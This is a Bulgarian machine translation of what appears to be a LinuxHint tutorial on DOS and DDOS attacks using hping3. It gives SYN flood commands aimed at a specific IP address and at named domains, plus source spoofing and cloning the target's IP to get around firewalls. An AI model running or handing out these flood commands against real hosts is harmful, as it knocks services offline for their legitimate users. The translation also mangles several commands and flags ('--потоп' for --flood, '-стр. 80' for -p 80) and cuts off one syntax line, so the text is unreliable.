DOS атаки
Атаката за отказ на услуга (DOS) е много проста техника за отказване на достъп до услуги (затова се нарича атака „отказ на услуга“). Тази атака се състои в претоварване на целта с големи пакети или голямо количество от тях.
Въпреки че тази атака е много лесна за изпълнение, тя не компрометира информацията или поверителността на целта, тя не е проникваща атака и има за цел само да предотврати достъпа до целта.
Чрез изпращане на количество пакети целта не може да се справи с нападателите, за да попречи на сървъра да обслужва легитимни потребители.
DOS атаките се извършват от едно устройство, поради което е лесно да ги спрете, като блокирате IP на атакуващия, но атакуващият може да променя и дори да подправя (клонира) целевия IP адрес, но не е трудно за защитните стени да се справят с такива атаки , противно на това, което се случва с DDOS атаки.
DDOS атаки
Разпределената атака за отказ на услуга (DDOS) е подобна на DOS атака, но се извършва едновременно от различни възли (или различни нападатели). Обикновено DDOS атаките се извършват от ботнети. Ботнетите са автоматизирани скриптове или програми, които заразяват компютрите, за да изпълнят автоматизирана задача (в този случай DDOS атака). Хакерът може да създаде ботнет и да зарази много компютри, от които ботнетите ще стартират DOS атаки, фактът, че много ботнети стрелят едновременно, превръща DOS атаката в DDOS атака (затова се нарича „разпределена“).
Разбира се, има изключения, при които DDOS атаки са били извършени от истински нападатели на хора, например групата хакери Anonymous, интегрирана от хиляди хора по целия свят, е използвала тази техника много често поради нейното лесно изпълнение (изисква се само доброволци, които споделят каузата си), така например Аноним остави либийското правителство на Кадафи напълно разединено по време на инвазията, либийската държава остана беззащитна пред хиляди нападатели от цял свят.
Този тип атаки, когато се извършват от много различни възли, е изключително трудно да се предотвратят и спрат и обикновено изискват специален хардуер за справяне, това е така, защото защитните стени и защитните приложения не са подготвени да се справят едновременно с хиляди нападатели. Това не е случаят с hping3, повечето атаки, извършени чрез този инструмент, ще бъдат блокирани от защитни устройства или софтуер, но е полезен в локални мрежи или срещу лошо защитени цели.
Относно hping3
Инструментът hping3 ви позволява да изпращате манипулирани пакети. Този инструмент ви позволява да контролирате размера, количеството и фрагментацията на пакетите, за да претоварите целта и да заобиколите или атакувате защитни стени. Hping3 може да бъде полезен за целите на сигурността или тестването на способности, като го използвате, можете да тествате ефективността на защитните стени и ако сървърът може да обработва голямо количество пакети. По-долу ще намерите инструкции как да използвате hping3 за целите на тестването на сигурността.
Първи стъпки с DDOS атаки с помощта на hping3:
На дистрибуциите на Debian и Linux можете да инсталирате hping3, като стартирате:
# apt инсталирайте hping3 -y
Една проста DOS (а не DDOS) атака би била:
# sudo hping3 -S --flood -V -p 80 170.155.9.185
Където:
sudo: дава необходимите привилегии за стартиране на hping3.
hping3: извиква програма hping3.
-С: определя SYN пакети.
-наводнение: стреляйте по преценка, отговорите ще бъдат игнорирани (затова отговорите няма да се показват) и пакетите ще бъдат изпратени възможно най-бързо.
-V: Многословие.
-стр. 80: порт 80, можете да замените този номер за услугата, която искате да атакувате.
170.155.9.185: целеви IP.
Flood, използвайки SYN пакети срещу порт 80:
Следващият пример изобразява SYN атака срещу лакампора.org:
# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-sourceКъдето:
Лакампора.org: е целта
-q: кратък изход
-н: показва целевия IP вместо хост.
-d 120: задайте размер на пакета
-rand-source: скриване на IP адрес.
Следващият пример показва друг възможен пример за наводнение:
SYN наводнение срещу порт 80:
# sudo hping3 --rand-source ivan.com -S -q -p 80 --потоп
С hping3 можете също да атакувате целите си с фалшив IP, за да заобиколите защитната стена, можете дори да клонирате самия целеви IP или всеки разрешен адрес, който може да знаете (можете да го постигнете, например с Nmap или sniffer, за да слушате установен връзки).
Синтаксисът ще бъде:
# sudo hping3 -aВ този практически пример атаката изглежда:
# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 - по-бързо -c2
Надявам се, че този урок за hping3 ви е бил полезен. Продължавайте да следвате LinuxHint за още съвети и актуализации за Linux и мрежи.